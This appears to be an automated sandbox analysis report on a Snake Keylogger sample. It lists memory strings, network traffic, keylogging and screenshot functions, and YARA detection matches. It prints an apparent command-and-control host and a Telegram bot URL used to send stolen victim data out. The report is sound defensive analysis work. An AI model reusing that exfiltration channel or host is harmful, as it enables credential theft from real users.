                Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000031A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000031A9000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000031A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000031A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20a
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003255000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003250000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                Source: svchost.exe, 00000006.00000003.1203129421.0000017E6D440000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000031A9000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003180000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.000000000313B000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.00000000031A9000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003180000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3613783171.000000000417E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003286000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003277000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49721 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 3GrfjMY0pG.exe, HookManager.cs.Net Code: EnsureSubscribedToGlobalKeyboardEvents
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 0_2_0E918EF8 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0E918EF8
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 0_2_0E918F08 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0E918F08

                System Summary

                barindex
                Source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: 3GrfjMY0pG.exe PID: 6956, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: 3GrfjMY0pG.exe PID: 6092, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 0_2_01623E0C0_2_01623E0C
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 0_2_016273900_2_01627390
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 0_2_0E91D7700_2_0E91D770
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 0_2_0E911C900_2_0E911C90
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 0_2_0E915AC00_2_0E915AC0
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 0_2_0E911C900_2_0E911C90
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 0_2_0E9129100_2_0E912910
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 0_2_0E915AC00_2_0E915AC0
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 0_2_0E929FB00_2_0E929FB0
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 0_2_0E9222C80_2_0E9222C8
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_0147C1475_2_0147C147
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_014753625_2_01475362
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_0147D2785_2_0147D278
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_0147C4685_2_0147C468
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_0147C7385_2_0147C738
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_0147E9885_2_0147E988
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_014769A05_2_014769A0
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_0147CA085_2_0147CA08
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_01479DE05_2_01479DE0
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_0147CCD85_2_0147CCD8
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_01476FC85_2_01476FC8
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_0147CFA95_2_0147CFA9
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_0147F6315_2_0147F631
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_0147E97C5_2_0147E97C
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_014729EC5_2_014729EC
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_0147FA885_2_0147FA88
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_01473AA15_2_01473AA1
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_01473E095_2_01473E09
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C91E805_2_06C91E80
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9E6B05_2_06C9E6B0
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C917A05_2_06C917A0
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C99C185_2_06C99C18
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C995485_2_06C99548
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C90B305_2_06C90B30
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C950285_2_06C95028
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C929685_2_06C92968
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9E6AF5_2_06C9E6AF
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C91E705_2_06C91E70
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9DE005_2_06C9DE00
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9178F5_2_06C9178F
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9EF515_2_06C9EF51
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9EF605_2_06C9EF60
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9CC8F5_2_06C9CC8F
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9CCA05_2_06C9CCA0
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9DDFF5_2_06C9DDFF
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9D5405_2_06C9D540
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9D5505_2_06C9D550
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9EAF85_2_06C9EAF8
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9E2495_2_06C9E249
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9E2585_2_06C9E258
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C98B905_2_06C98B90
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9F3A85_2_06C9F3A8
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C98BA05_2_06C98BA0
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9F3B85_2_06C9F3B8
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9EB085_2_06C9EB08
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C90B205_2_06C90B20
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9D0F85_2_06C9D0F8
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C900405_2_06C90040
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9F8015_2_06C9F801
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C900065_2_06C90006
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C950185_2_06C95018
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9F8105_2_06C9F810
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9D9995_2_06C9D999
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C9D9A85_2_06C9D9A8
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004399000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJmdv.exe. vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\000004B0\\OriginalFilename vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000000.1136291884.0000000000F42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJmdv.exe. vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1196550082.00000000059C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1192272100.00000000030D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.00000000043D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000000.00000002.1191269934.000000000163E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3609453878.00000000011C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3609203581.00000000010F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exeBinary or memory string: OriginalFilenameJmdv.exe. vs 3GrfjMY0pG.exe
                Source: 3GrfjMY0pG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
